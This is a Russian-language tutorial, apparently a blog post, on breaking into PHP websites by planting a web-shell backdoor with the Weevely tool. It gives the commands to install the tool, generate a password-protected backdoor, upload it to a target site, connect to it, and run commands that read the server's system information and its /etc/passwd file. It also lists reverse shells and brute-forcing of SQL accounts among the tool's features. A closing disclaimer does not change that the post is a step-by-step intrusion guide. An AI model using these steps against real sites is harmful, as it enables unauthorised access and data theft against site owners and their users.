Этот пост о взломе веб-сайтов с помощью бэкдора. Сегодня мы узнаем, как взломать веб-сайт с помощью оболочки PHP-бэкдора. Weevely - это инструмент, который помогает внедрить бэкдор в любой веб-сайт PHP.
Мы загружаем на веб-сайт файл, такой как: документ, PDF-файл и изображение, и вы можете загрузить собственную PHP-страницу на веб-сайт. Этот инструмент обнаружит слабые места в вашей цели, если сайт уязвим, вы можете загрузить на веб-сайт любую вещь. Если мы загружаем тип вредоносного ПО Дело в том, что это вред целевому сайту. как взломать сайт с помощью бэкдора PHP.
Что такое бэкдор?
В Ethical hacking Hacking и Cyber Security World, бэкдор - это метод, с помощью которого злоумышленник получает доступ к любому компьютеру, веб-сайту и т.д. без их разрешения.
Что такое Weevely?
Wevely - это веб-программное обеспечение, которое предоставляет веб-оболочку PHP, которая загружается на веб-сайт и запускается бэкдор. Помните, что это работает на веб-сайте написанным на PHP, их миллион веб-сайтов в мире имеет серверную часть PHP.
Функции:
- Доступ к оболочки цели
- SQL console pivoting on the target
- Прокси-сервер HTTP / HTTPS для просмотра цели
- Загружать и скачивать файлы
- Создавать обратные и прямые TCP-оболочки
- Аудит безопасности удаленного целевого объекта
- Сканирование портов цели
- Сканирование удалённой файловой системы
- Brutforce учётных записей SQL
Инструмент Weevely уже установлен в Kali Linux Os. Если вы используете другую платформу, используйте следующую команду для установки
git clone https://github.com/eppina/weevely3
Прежде всего, откройте терминал для машин Kali и введите «weevely».
Wevely покажите нам информацию для типа помощи «weevely –help»
Эта команда показывает нам, как работать в трёх режимах.
generate
terminal
session
Как создать бэкдор
Теперь мы создаем бэкдор для нашего целевого веб-сайта, введите следующую команду
weevely generate [ backdoor password ] [ path and name of backdoor]
Сначала мы создаем бэкдор для целевого сайта.
weevely generate 12345 /root/Desktop/backdoor
Наконец, мы успешно сгенерировали бэкдор. Из-за проблем с безопасностью (своей) я не могу показать вам на практике, как внедрить бэкдор, я расскажу вам всю рабочую схему, которая будет использоваться для создания сеанса, загрузите бэкдор PHP на ваш целевой веб-сайт.
Когда мы успешно загрузили бэкдор, теперь пришло время выполнить активацию бэкдора, введите следующую команду
weevely [url of target location where is upload ] password of backdoor ]
например:
weevely http://192.168.1.109...se-backdoor.php 12345
Он успешно выполнен, в результате наша оболочка PHP откроется автоматически.
Введите команду «help» и посмотрите, что мы можем сделать.
По очереди введите следующую команду:
system-info
audit-etcpasswd
Наконец, мы загружаем файл PHP на веб-сайт и запускаем этот файл с помощью инструмента Wevely.
Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.